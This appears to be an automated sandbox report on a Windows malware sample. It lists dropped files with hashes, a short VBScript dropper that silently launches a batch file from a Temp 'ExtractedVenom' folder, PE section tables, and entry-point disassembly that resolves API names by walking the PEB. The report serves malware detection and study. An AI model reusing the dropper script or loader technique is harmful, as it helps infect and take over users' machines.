                                                                                    Preview:PK.........t.X.............data.bin..,..`......Z.......0..................`...8..k.@~CBBxED....&dI.....,.e...D3c......u.6........,...Q... .aH]?A...x.W7.c..;.f.U.....C.ZK.W...v...o....R....u-2.........#..S_....m..?...4..K...v.IlUe.........D.....R. I..h6.B.....Z}iN..H.hd....,....".n e8.p..+....8...M.D.M.s...5.$..F/*...f.(........&...%....6..+.Q7..`\.1.q.g..u.d.6.A.[.=?.@...e.I......^....>......c...z..Qn1..~.+y.... .........]..C.f..GZm3.....A8..f_.r.1.8..Mar9.j.(...6K..J..>.R..jlNx.Lr..333..d.nJc Z...f.O...`.Jiz.w3...s.d.R......+..\...M......s.J.!W.......FQ(...&.j|..1.;.}.yo.....1..Al.......6]A.nD.-.~..pz~.1...g.........................D/V"\N..c.q.nxi...8l..7.^...l.(S^...H......R......V. .u..T.....7;2...Q.)5(.0...!..../......z.]..,..!N........q...5|V......e.:P..%._.L....xu...;.r..~.&....k.Q.@...(..o.2..h..G..Z%...N.....;".}*....%7.\<...'..c....s. \0..f)7eh....M.....F.v}...}c..Gy3..I.j.@..F...|.....K.M.$.z...aF...z.....\LB.H....}.)8$...8iV...<.'A...L.P
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):6886
                                                                                    Entropy (8bit):7.895098216672666
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
                                                                                    MD5:099BA37F81C044F6B2609537FDB7D872
                                                                                    SHA1:470EF859AFBCE52C017874D77C1695B7B0F9CB87
                                                                                    SHA-256:8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
                                                                                    SHA-512:837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.|......U.0.0.4*..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>*..}`.....j..........M..-..x...,!..L+.'........*..s77f.|.h..*.0/.4||......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):6886
                                                                                    Entropy (8bit):7.895098216672666
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
                                                                                    MD5:099BA37F81C044F6B2609537FDB7D872
                                                                                    SHA1:470EF859AFBCE52C017874D77C1695B7B0F9CB87
                                                                                    SHA-256:8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
                                                                                    SHA-512:837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.|......U.0.0.4*..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>*..}`.....j..........M..-..x...,!..L+.'........*..s77f.|.h..*.0/.4||......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):6886
                                                                                    Entropy (8bit):7.895098216672666
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
                                                                                    MD5:099BA37F81C044F6B2609537FDB7D872
                                                                                    SHA1:470EF859AFBCE52C017874D77C1695B7B0F9CB87
                                                                                    SHA-256:8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
                                                                                    SHA-512:837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.|......U.0.0.4*..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>*..}`.....j..........M..-..x...,!..L+.'........*..s77f.|.h..*.0/.4||......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):6886
                                                                                    Entropy (8bit):7.895098216672666
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
                                                                                    MD5:099BA37F81C044F6B2609537FDB7D872
                                                                                    SHA1:470EF859AFBCE52C017874D77C1695B7B0F9CB87
                                                                                    SHA-256:8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
                                                                                    SHA-512:837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.|......U.0.0.4*..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>*..}`.....j..........M..-..x...,!..L+.'........*..s77f.|.h..*.0/.4||......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):6886
                                                                                    Entropy (8bit):7.895098216672666
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
                                                                                    MD5:099BA37F81C044F6B2609537FDB7D872
                                                                                    SHA1:470EF859AFBCE52C017874D77C1695B7B0F9CB87
                                                                                    SHA-256:8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
                                                                                    SHA-512:837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.|......U.0.0.4*..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>*..}`.....j..........M..-..x...,!..L+.'........*..s77f.|.h..*.0/.4||......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):6886
                                                                                    Entropy (8bit):7.895098216672666
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
                                                                                    MD5:099BA37F81C044F6B2609537FDB7D872
                                                                                    SHA1:470EF859AFBCE52C017874D77C1695B7B0F9CB87
                                                                                    SHA-256:8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
                                                                                    SHA-512:837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.|......U.0.0.4*..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>*..}`.....j..........M..-..x...,!..L+.'........*..s77f.|.h..*.0/.4||......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):6886
                                                                                    Entropy (8bit):7.895098216672666
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
                                                                                    MD5:099BA37F81C044F6B2609537FDB7D872
                                                                                    SHA1:470EF859AFBCE52C017874D77C1695B7B0F9CB87
                                                                                    SHA-256:8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
                                                                                    SHA-512:837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.|......U.0.0.4*..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>*..}`.....j..........M..-..x...,!..L+.'........*..s77f.|.h..*.0/.4||......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):246
                                                                                    Entropy (8bit):5.128117648119024
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:j6NqhmCOoLPFi23fa3r0XeFi23fa3HfNUqOUrv:JhmCOiZS3ruAZS3+O7
                                                                                    MD5:1C3EFFC625546E497DBF40981B93250B
                                                                                    SHA1:E4F409137BC3B469C1FEE6D3898581EBC1A753CB
                                                                                    SHA-256:511033C6D8A15C31F0C3E3281C4B8AE27EEFE5E474F88707121CF2C5AE1A136A
                                                                                    SHA-512:C5D38C9AEE3606F3D44B42DA301ABAD47091BBB1B593445B63957835447BE1C9F2BEB8518AC8EB57A7C482E08A91DC2D090ECB22FD0BF3677F944A328475CE7C
                                                                                    Malicious:true
                                                                                    Preview:Set WshShell = CreateObject("WScript.Shell")..WshShell.CurrentDirectory = "C:\Users\user\AppData\Local\Temp\ExtractedVenom"..WshShell.Run chr(34) & "C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" & Chr(34), 0..Set WshShell = Nothing..
                                                                                    Process:C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):8
                                                                                    Entropy (8bit):2.75
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Rt:v
                                                                                    MD5:CF759E4C5F14FE3EEC41B87ED756CEA8
                                                                                    SHA1:C27C796BB3C2FAC929359563676F4BA1FFADA1F5
                                                                                    SHA-256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
                                                                                    SHA-512:C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
                                                                                    Malicious:false
                                                                                    Preview:.5.False
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):186368
                                                                                    Entropy (8bit):6.613118398873433
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:xAL4MQSsrTe/6ocp7B8WvYmD/5yW5VXU/2PE9wXGCH:eL4KspNjVhPS
                                                                                    MD5:779806A66CCCB6B37A02F6B30F7AECF3
                                                                                    SHA1:0A16526E664EBCFADB6B958580AA12B3DEFF8645
                                                                                    SHA-256:F42503B4678644E3475344042DAFA742E5F3D2D75A7C16409F10D7BCCA17E028
                                                                                    SHA-512:40C6234EB7753D9CBC4E98BC964B61E8A7B1CA9D97B4314B3F7CBD03060517AE5F5561E33F9334E43C0F74FF8449A795DE38F034541E8FBEB4E58661568DADCB
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 95%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b{...(...(...(...(...(...(...(...(...(.(w(...(...(...(...(...(...(...(...(...(Rich...(........................PE..L.....we.............................P............@.........................................................................|...P....p..................................................................................x............................text...\p.......r.................. ..`.rdata... ......."...v..............@..@.data...<c..........................@....gigug..|....0......................@....nigabu......P......................@..@.hud.........`......................@....rsrc........p......................@..@.s...up..P...P...B.................. ...................................................................................................................................................................................................
                                                                                    Process:C:\Windows\explorer.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    Process:C:\Users\user\AppData\Local\Temp\IXDaI.exe
                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                    Category:dropped
                                                                                    Size (bytes):1835008
                                                                                    Entropy (8bit):4.296076396592429
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:N41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+U4mBMZJh1VjT:61/YCW2AoQ0NiG4wMHrVX
                                                                                    MD5:D446B43E1B2D7D79495DD20182728719
                                                                                    SHA1:169819740B5D0B6DA1AA894D3B5344FB799D3D0E
                                                                                    SHA-256:21C18ABD077000A494A255ABDB76CC48D86EB9F75EC6FF7E3F6BA917950B5EC1
                                                                                    SHA-512:D00D38FDFA07FE89D53A7A296F934CD2D93881C5540E71B290346A54812B6F61325613463CC89C6E10D7017259D0555573320CEA5D909DBF539E93A2DDBE5436
                                                                                    Malicious:false
                                                                                    Preview:regfH...H....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmvN.................................................................................................................................................................................................................................................................................................................................................."...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):6.613118398873433
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:7Y18r(14).exe
                                                                                    File size:186'368 bytes
                                                                                    MD5:779806a66cccb6b37a02f6b30f7aecf3
                                                                                    SHA1:0a16526e664ebcfadb6b958580aa12b3deff8645
                                                                                    SHA256:f42503b4678644e3475344042dafa742e5f3d2d75a7c16409f10d7bcca17e028
                                                                                    SHA512:40c6234eb7753d9cbc4e98bc964b61e8a7b1ca9d97b4314b3f7cbd03060517ae5f5561e33f9334e43c0f74ff8449a795de38f034541e8fbeb4e58661568dadcb
                                                                                    SSDEEP:3072:xAL4MQSsrTe/6ocp7B8WvYmD/5yW5VXU/2PE9wXGCH:eL4KspNjVhPS
                                                                                    TLSH:80046A2136F58336F3F39A746976A3A04B3BB8737970C1AE2250261B1DB27C19D96713
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b{...(...(...(...(...(...(...(...(...(.(w(...(...(...(...(...(...(...(...(...(Rich...(........................PE..L.....we...
                                                                                    Icon Hash:cb97374d5555599a
                                                                                    Entrypoint:0x4c5000
                                                                                    Entrypoint Section:sup
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x6577A990 [Tue Dec 12 00:30:08 2023 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:0
                                                                                    File Version Major:5
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:61aeaa8ec5698536c7a8f0b1ac00ff47
                                                                                    Instruction
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 0000016Ch
                                                                                    xor eax, eax
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    mov dword ptr [ebp-24h], eax
                                                                                    mov dword ptr [ebp-10h], eax
                                                                                    mov dword ptr [ebp-14h], eax
                                                                                    mov dword ptr [ebp-08h], eax
                                                                                    mov dword ptr [ebp-0Ch], eax
                                                                                    mov dword ptr [ebp-20h], eax
                                                                                    mov dword ptr [ebp-18h], eax
                                                                                    mov dword ptr [ebp-48h], 61445849h
                                                                                    mov dword ptr [ebp-44h], 78652E49h
                                                                                    mov dword ptr [ebp-40h], 00000065h
                                                                                    mov dword ptr [ebp-3Ch], 00000000h
                                                                                    call 00007F9868C2FD65h
                                                                                    pop eax
                                                                                    add eax, 00000225h
                                                                                    mov dword ptr [ebp-04h], eax
                                                                                    mov eax, dword ptr fs:[00000030h]
                                                                                    mov dword ptr [ebp-28h], eax
                                                                                    mov eax, dword ptr [ebp-04h]
                                                                                    mov dword ptr [eax], E904C483h
                                                                                    mov eax, dword ptr [ebp-04h]
                                                                                    mov dword ptr [eax+04h], FFF3C42Ah
                                                                                    mov eax, dword ptr [ebp-28h]
                                                                                    mov eax, dword ptr [eax+0Ch]
                                                                                    mov eax, dword ptr [eax+1Ch]
                                                                                    mov eax, dword ptr [eax]
                                                                                    mov eax, dword ptr [eax+08h]
                                                                                    mov ecx, dword ptr [eax+3Ch]
                                                                                    mov ecx, dword ptr [ecx+eax+78h]
                                                                                    add ecx, eax
                                                                                    mov edi, dword ptr [ecx+1Ch]
                                                                                    mov ebx, dword ptr [ecx+20h]
                                                                                    mov esi, dword ptr [ecx+24h]
                                                                                    mov ecx, dword ptr [ecx+18h]
                                                                                    add esi, eax
                                                                                    add edi, eax
                                                                                    add ebx, eax
                                                                                    xor edx, edx
                                                                                    mov dword ptr [ebp-30h], esi
                                                                                    mov dword ptr [ebp-1Ch], edx
                                                                                    mov dword ptr [ebp-34h], ecx
                                                                                    cmp edx, dword ptr [ebp-34h]
                                                                                    jnc 00007F9868C2FEAEh
                                                                                    movzx ecx, word ptr [esi+edx*2]
                                                                                    mov edx, dword ptr [ebx+edx*4]
                                                                                    mov esi, dword ptr [edi+ecx*4]
                                                                                    add edx, eax
                                                                                    mov ecx, dword ptr [edx]
                                                                                    add esi, eax
                                                                                    cmp ecx, 4D746547h
                                                                                    jne 00007F9868C2FDB4h
                                                                                    cmp dword ptr [edx+04h], 6C75646Fh
                                                                                    jne 00007F9868C2FDABh
                                                                                    Programming Language:
                                                                                    • [C++] VS2008 build 21022
                                                                                    • [ASM] VS2008 build 21022
                                                                                    • [ C ] VS2008 build 21022
                                                                                    • [IMP] VS2005 build 50727
                                                                                    • [RES] VS2008 build 21022
                                                                                    • [LNK] VS2008 build 21022
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1a87c0x50.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xb70000xd6f8.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x190000x178.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x1705c0x172002c4963a1d9da63e08d44b1c689076c92False0.7984375data7.471980252090664IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x190000x20f20x220099184cfdaab82b64a7e97e96a5c88e4bFalse0.3639705882352941data5.473318112162758IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x1c0000x9633c0x1800205c00fa550d2a1f0770471be61a99e3False0.14876302083333334data1.603367657716206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .gigug0xb30000x107c0x800c99a74c555371a433d121f551d6c6398False0.01123046875data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .nigabu0xb50000xc0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .hud0xb60000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0xb70000xd6f80xd800e937ba95089411c105e86e3fac649da3False0.5247757523148148data5.190943274302459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    sup0xc50000x50000x420088ffce8ba42ffb9123d9b2c928068a3dFalse0.7775804924242424data6.934340827164694IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    DEMAFE0xbdee80x3faASCII text, with very long lines (1018), with no line terminatorsTurkishTurkey0.6257367387033399
                                                                                    RT_CURSOR0xbe3000x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                                    RT_ICON0xb76b00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.6108742004264393
